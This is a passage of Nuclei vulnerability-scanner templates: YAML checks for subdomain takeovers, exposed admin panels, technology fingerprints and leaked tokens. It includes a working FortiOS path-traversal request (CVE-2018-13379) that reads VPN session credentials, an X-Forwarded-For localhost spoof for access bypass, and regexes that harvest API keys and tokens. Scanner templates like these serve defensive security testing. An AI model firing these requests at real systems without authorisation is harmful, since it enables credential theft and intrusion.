13 | matchers: 14 | - type: word 15 | words: 16 | - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" -------------------------------------------------------------------------------- /takeovers/kinsta-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: kinsta-takeover 2 | 3 | info: 4 | name: kinsta takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - No Site For Domain -------------------------------------------------------------------------------- /technologies/werkzeug-debugger-detect.yaml: -------------------------------------------------------------------------------- 1 | id: werkzeug-debugger-detect 2 | 3 | info: 4 | name: Werkzeug debugger console 5 | author: pdteam 6 | severity: info 7 | tags: tech,werkzeug 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/console" 13 | matchers: 14 | - type: word 15 | words: 16 | - "

Interactive Console

" 17 | part: body 18 | -------------------------------------------------------------------------------- /workflows/wordpress-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-workflow 2 | info: 3 | name: Wordpress Security Checks 4 | author: kiblyn11,zomsop82 5 | description: A simple workflow that runs all wordpress related nuclei templates on a given target. 6 | 7 | workflows: 8 | 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: wordpress 12 | subtemplates: 13 | - tags: wordpress -------------------------------------------------------------------------------- /exposed-panels/exposed-pagespeed-global-admin.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-pagespeed-global-admin 2 | 3 | info: 4 | name: Apache PageSpeed Global Admin Dashboard Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/pagespeed_admin/' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Pagespeed Admin" -------------------------------------------------------------------------------- /exposed-panels/parallels-html-client.yaml: -------------------------------------------------------------------------------- 1 | id: parallels-html-client 2 | 3 | info: 4 | name: Parallels HTML5 Client 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/RASHTML5Gateway/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Parallels HTML5 Client" 17 | part: body 18 | -------------------------------------------------------------------------------- /exposures/tokens/generic/jwt-token.yaml: -------------------------------------------------------------------------------- 1 | id: jwt-token 2 | 3 | info: 4 | name: JWT Token Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}' -------------------------------------------------------------------------------- /exposures/tokens/sonarqube/sonarqube-token.yaml: -------------------------------------------------------------------------------- 1 | id: sonarqube-token 2 | 3 | info: 4 | name: SonarQube Token Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?" -------------------------------------------------------------------------------- /exposures/tokens/stripe/stripe-restricted-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-restricted-key 2 | 3 | info: 4 | name: Stripe Restricted Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'rk_(?:live|test)_[0-9a-zA-Z]{24}' -------------------------------------------------------------------------------- /technologies/shiro-detect.yaml: -------------------------------------------------------------------------------- 1 | id: shiro-detect 2 | 3 | info: 4 | name: Detect Shiro Framework 5 | author: AresX 6 | severity: info 7 | tags: tech,shiro 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | headers: 14 | Cookie: rememberMe=123; 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'rememberMe=deleteMe' 20 | part: header -------------------------------------------------------------------------------- /exposed-panels/manage-engine-admanager-panel.yaml: -------------------------------------------------------------------------------- 1 | id: manage-engine-admanager-panel 2 | 3 | info: 4 | name: Manage Engine ADManager Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/authorization.do" 13 | matchers: 14 | - type: word 15 | words: 16 | - "ManageEngine - ADManager Plus" 17 | -------------------------------------------------------------------------------- /misconfiguration/jkstatus-manager.yaml: -------------------------------------------------------------------------------- 1 | id: jkstatus-manager 2 | 3 | info: 4 | name: JK Status Manager 5 | author: pdteam 6 | severity: low 7 | tags: config 8 | 9 | requests: 10 | - method: GET 11 | headers: 12 | X-Forwarded-For: "127.0.0.1" 13 | path: 14 | - "{{BaseURL}}/jkstatus/" 15 | matchers: 16 | - type: word 17 | words: 18 | - "JK Status Manager" 19 | -------------------------------------------------------------------------------- /takeovers/jazzhr-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: jazzhr-takeover 2 | 3 | info: 4 | name: jazzhr takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - This account no longer active -------------------------------------------------------------------------------- /takeovers/mashery-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: mashery-takeover 2 | 3 | info: 4 | name: mashery takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Unrecognized domain -------------------------------------------------------------------------------- /takeovers/readme-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: readme-takeover 2 | 3 | info: 4 | name: readme takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Project doesnt exist... yet! -------------------------------------------------------------------------------- /takeovers/smugmug-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: smugmug-takeover 2 | 3 | info: 4 | name: smugmug takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - '{"text":"Page Not Found"' -------------------------------------------------------------------------------- /takeovers/surveygizmo-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: surveygizmo-takeover 2 | 3 | info: 4 | name: surveygizmo takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - data-html-name -------------------------------------------------------------------------------- /takeovers/tave-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: tave-takeover 2 | 3 | info: 4 | name: tave takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "

Error 404: Page Not Found

" -------------------------------------------------------------------------------- /technologies/google-storage.yaml: -------------------------------------------------------------------------------- 1 | id: gstorage-detect 2 | 3 | info: 4 | name: Google Bucket detection 5 | author: 0xTeles 6 | severity: info 7 | tags: tech,gstorage,google,bucket 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers: 14 | - type: word 15 | words: 16 | - x-goog-metageneration 17 | - X-Goog-Metageneration 18 | part: header -------------------------------------------------------------------------------- /workflows/artica-web-proxy-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: artica-web-proxy-workflow 2 | 3 | info: 4 | name: Artica Web Proxy Security Checks 5 | author: dwisiswant0,pdteam 6 | description: A simple workflow that runs all Artica Web Proxy related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/artica-web-proxy-detect.yaml 10 | subtemplates: 11 | - template: cves/2020/CVE-2020-17505.yaml -------------------------------------------------------------------------------- /workflows/jellyfin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: jellyfin-workflow 2 | info: 3 | name: Jellyfin Security Checks 4 | author: dwisiswant0 5 | description: A simple workflow that runs all Jellyfin related nuclei templates on a given target. 6 | 7 | workflows: 8 | - template: technologies/jellyfin-detect.yaml 9 | subtemplates: 10 | - template: cves/2020/CVE-2020-26948.yaml 11 | - template: cves/2021/CVE-2021-21402.yaml -------------------------------------------------------------------------------- /cves/2018/CVE-2018-13379.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-13379 2 | 3 | info: 4 | name: FortiOS - Credentials Disclosure 5 | author: organiccrap 6 | severity: high 7 | tags: cve,cve2018,fortios 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" 13 | matchers: 14 | - type: word 15 | words: 16 | - "var fgt_lang" 17 | -------------------------------------------------------------------------------- /exposed-panels/dotcms-admin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: dotcms-admin-panel 2 | 3 | info: 4 | name: dotAdmin Panel 5 | author: impramodsargar 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/dotAdmin/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'dotCMS Content Management Platform' 19 | -------------------------------------------------------------------------------- /exposed-panels/druid-console-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: druid-console-exposure 2 | 3 | info: 4 | name: Alibaba Druid Console Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'src="/druid.js"' 18 | - 'href="/druid.css"' 19 | condition: and -------------------------------------------------------------------------------- /exposed-panels/github-enterprise-detect.yaml: -------------------------------------------------------------------------------- 1 | id: github-enterprise-detect 2 | 3 | info: 4 | name: Detect Github Enterprise 5 | author: ehsahil 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/login" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: word 18 | words: 19 | - "GitHub · Enterprise" 20 | -------------------------------------------------------------------------------- /exposures/tokens/amazon/amazon-sns-topic.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-sns-topic 2 | 3 | info: 4 | name: Amazon SNS Topic Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,amazon 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' -------------------------------------------------------------------------------- /miscellaneous/detect-options-method.yaml: -------------------------------------------------------------------------------- 1 | id: detect-options-method 2 | 3 | info: 4 | name: Detect enabled OPTIONS methods 5 | author: pdteam 6 | severity: info 7 | tags: misc,generic 8 | 9 | requests: 10 | - method: OPTIONS 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: header 17 | group: 1 18 | regex: 19 | - "Allow: ([A-Z, ]+)" 20 | -------------------------------------------------------------------------------- /takeovers/hatenablog-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: hatenablog-takeover 2 | 3 | info: 4 | name: hatenablog takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 404 Blog is not found -------------------------------------------------------------------------------- /takeovers/zendesk-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: zendesk-takeover 2 | 3 | info: 4 | name: zendesk takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - this help center no longer exists -------------------------------------------------------------------------------- /.github/workflows/syntax-checking.yml: -------------------------------------------------------------------------------- 1 | name: ❄️ YAML Lint 2 | 3 | on: [push, pull_request] 4 | 5 | jobs: 6 | build: 7 | runs-on: ubuntu-latest 8 | steps: 9 | - uses: actions/checkout@v2 10 | - name: Yamllint 11 | uses: karancode/yamllint-github-action@master 12 | with: 13 | yamllint_config_filepath: .yamllint 14 | yamllint_strict: false 15 | yamllint_comment: true 16 | -------------------------------------------------------------------------------- /exposed-panels/ansible-tower-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: ansible-tower-exposure 2 | 3 | info: 4 | name: Ansible Tower Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Ansible Tower" 18 | - "ansible-main-menu" 19 | condition: and -------------------------------------------------------------------------------- /exposed-panels/exposed-webalizer.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-webalizer 2 | 3 | info: 4 | name: Publicly exposed Webalizer Interface 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/webalizer/' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Webalizer Version" 17 | - "Usage statistics for" 18 | condition: and -------------------------------------------------------------------------------- /exposed-panels/phppgadmin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: phppgadmin-panel 2 | 3 | info: 4 | name: phpPgAdmin Panel 5 | author: Ganofins 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/phppgadmin/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "phpPgAdmin" 17 | - "browser.php" 18 | - "intro.php" 19 | condition: and 20 | -------------------------------------------------------------------------------- /exposed-panels/traefik-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: traefik-dashboard-detect 2 | 3 | info: 4 | name: Traefik Dashboard 5 | author: schniggie,StreetOfHackerR007 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/dashboard/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "" 17 | part: body 18 | -------------------------------------------------------------------------------- /exposed-panels/webmin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: webmin-panel 2 | 3 | info: 4 | name: Webmin Admin Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/webmin/" 14 | redirects: true 15 | matchers: 16 | - type: word 17 | words: 18 | - "Login to Webmin" 19 | part: body 20 | -------------------------------------------------------------------------------- /exposures/configs/perl-status.yaml: -------------------------------------------------------------------------------- 1 | id: perl-status 2 | 3 | info: 4 | name: Apache mod_perl Status Page Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/perl-status' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Apache2::Status" 17 | - "Perl version" 18 | condition: and -------------------------------------------------------------------------------- /takeovers/feedpress-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: feedpress-takeover 2 | 3 | info: 4 | name: Agilecrm Takeover Detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'The feed has not been found.' -------------------------------------------------------------------------------- /takeovers/gemfury-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: gemfury-takeover 2 | 3 | info: 4 | name: gemfury takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "404: This page could not be found." -------------------------------------------------------------------------------- /takeovers/jetbrains-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: jetbrains-takeover 2 | 3 | info: 4 | name: jetbrains takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | matchers: 15 | - type: word 16 | words: 17 | - is not a registered InCloud YouTrack. -------------------------------------------------------------------------------- /takeovers/readthedocs-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: readthedocs-takeover 2 | 3 | info: 4 | name: readthedocs takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - unknown to Read the Docs -------------------------------------------------------------------------------- /takeovers/teamwork-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: teamwork-takeover 2 | 3 | info: 4 | name: teamwork takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Oops - We didn't find your site. -------------------------------------------------------------------------------- /vulnerabilities/jira/jira-unauthenticated-user-picker.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-user-picker 2 | 3 | info: 4 | name: Jira Unauthenticated User Picker 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'user-picker' -------------------------------------------------------------------------------- /workflows/micro-focus-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: micro-focus-workflow 2 | 3 | info: 4 | name: Micro Focus Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all Micro Focus related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml 10 | - template: cves/2020/CVE-2020-11853.yaml 11 | - template: cves/2020/CVE-2020-11854.yaml 12 | -------------------------------------------------------------------------------- /exposed-panels/active-admin-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: active-admin-exposure 2 | 3 | info: 4 | name: ActiveAdmin Admin Dasboard Exposure 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin/login' 13 | matchers: 14 | - type: word 15 | words: 16 | - "active_admin_content" 17 | - "active_admin-" 18 | condition: and -------------------------------------------------------------------------------- /exposed-panels/prometheus-exposed-panel.yaml: -------------------------------------------------------------------------------- 1 | id: prometheus-exposed-panel 2 | 3 | info: 4 | name: Prometheus.io exposed panel 5 | author: organiccrap 6 | severity: low 7 | tags: panel,prometheus 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/graph' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '<title>Prometheus Time Series Collection and Processing Server' -------------------------------------------------------------------------------- /exposed-panels/selenoid-ui-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: selenoid-ui-exposure 2 | 3 | info: 4 | name: Selenoid UI Dashboard Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin/login' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Selenoid UI" 17 | - "/manifest.json" 18 | condition: and -------------------------------------------------------------------------------- /exposures/logs/struts-debug-mode.yaml: -------------------------------------------------------------------------------- 1 | id: struts-debug-mode 2 | 3 | info: 4 | name: Apache Struts setup in Debug-Mode 5 | author: pdteam 6 | severity: low 7 | tags: logs,struts,apache,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "" 18 | - "" 19 | condition: and -------------------------------------------------------------------------------- /exposures/tokens/generic/jdbc-connection-string.yaml: -------------------------------------------------------------------------------- 1 | id: jdbc-connection-string 2 | 3 | info: 4 | name: JDBC Connection String Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+' -------------------------------------------------------------------------------- /file/android/dynamic-broadcast-receiver.yaml: -------------------------------------------------------------------------------- 1 | id: dynamic-registered-broadcast-receiver 2 | 3 | info: 4 | name: Dynamic Registered Broadcast Receiver 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)" -------------------------------------------------------------------------------- /file/android/provider-path.yaml: -------------------------------------------------------------------------------- 1 | id: insecure-provider-path 2 | 3 | info: 4 | name: Insecure Provider Path 5 | author: gaurang 6 | severity: medium 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\".\"" 17 | - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\"\"" 18 | -------------------------------------------------------------------------------- /takeovers/agilecrm-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: agilecrm-takeover 2 | 3 | info: 4 | name: agilecrm takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Sorry, this page is no longer available. -------------------------------------------------------------------------------- /takeovers/aha-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: aha-takeover 2 | 3 | info: 4 | name: Aha Takeover Detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - There is no portal here ... sending you back to Aha! -------------------------------------------------------------------------------- /takeovers/vend-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: vend-takeover 2 | 3 | info: 4 | name: vend takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Looks like you've traveled too far into cyberspace. -------------------------------------------------------------------------------- /exposed-panels/activemq-panel.yaml: -------------------------------------------------------------------------------- 1 | id: activemq-panel 2 | 3 | info: 4 | name: Apache ActiveMQ Exposure 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '

Welcome to the Apache ActiveMQ!

' 18 | - 'Apache ActiveMQ' 19 | condition: and -------------------------------------------------------------------------------- /exposed-panels/atlassian-crowd-panel.yaml: -------------------------------------------------------------------------------- 1 | id: atlassian-crowd-panel 2 | 3 | info: 4 | name: Atlassian Crowd panel detect 5 | author: organiccrap 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/crowd/console/login.action' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - Atlassian Crowd - Login 18 | part: body 19 | -------------------------------------------------------------------------------- /exposures/configs/ansible-config-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: ansible-config-disclosure 2 | 3 | info: 4 | name: Ansible Configuration Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/ansible.cfg' 13 | matchers: 14 | - type: word 15 | words: 16 | - '[defaults]' 17 | - '[inventory]' 18 | condition: and -------------------------------------------------------------------------------- /exposures/files/drupal-install.yaml: -------------------------------------------------------------------------------- 1 | id: drupal-install 2 | 3 | info: 4 | name: Drupal Install 5 | author: NkxxkN 6 | severity: low 7 | tags: exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/install.php?profile=default" 13 | 14 | redirects: true 15 | max-redirects: 1 16 | matchers: 17 | - type: word 18 | words: 19 | - "Choose language | Drupal" 20 | -------------------------------------------------------------------------------- /exposures/tokens/artifactory/artifactory-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: artifactory-api-token 2 | 3 | info: 4 | name: Artifactory API Token Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,artifactory 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}' -------------------------------------------------------------------------------- /exposures/tokens/discord/discord-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: discord-webhook 2 | 3 | info: 4 | name: Discord Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,discord 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+' -------------------------------------------------------------------------------- /exposures/tokens/zoho/zoho-webhook-token.yaml: -------------------------------------------------------------------------------- 1 | id: zoho-webhook-token 2 | 3 | info: 4 | name: Zoho Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+' -------------------------------------------------------------------------------- /network/memcached-stats.yaml: -------------------------------------------------------------------------------- 1 | id: memcached-stats 2 | 3 | info: 4 | name: Memcached stats disclosure 5 | author: pdteam 6 | severity: low 7 | tags: network,memcached 8 | 9 | network: 10 | - inputs: 11 | - data: "stats\r\n\r\nquit\r\n" 12 | 13 | host: 14 | - "{{Hostname}}" 15 | - "{{Hostname}}:11211" 16 | read-size: 2048 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "STAT " -------------------------------------------------------------------------------- /takeovers/helpjuice-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: helpjuice-takeover 2 | 3 | info: 4 | name: helpjuice takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - We could not find what you're looking for. -------------------------------------------------------------------------------- /takeovers/wishpond-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: wishpond-takeover 2 | 3 | info: 4 | name: wishpond takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - https://www.wishpond.com/404?campaign=true -------------------------------------------------------------------------------- /exposed-panels/checkmarx-panel.yaml: -------------------------------------------------------------------------------- 1 | id: checkmarx-panel-detect 2 | 3 | info: 4 | name: Checkmarx WebClient detector 5 | author: joanbono 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/cxwebclient/Login.aspx" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '/CxWebClient/webApp/Scripts/libs/authenticationScripts' 18 | part: body 19 | -------------------------------------------------------------------------------- /exposed-panels/hmc-hybris-panel.yaml: -------------------------------------------------------------------------------- 1 | id: hmc-hybris-panel 2 | 3 | info: 4 | name: SAP Hybris Management Console 5 | author: dogasantos 6 | severity: 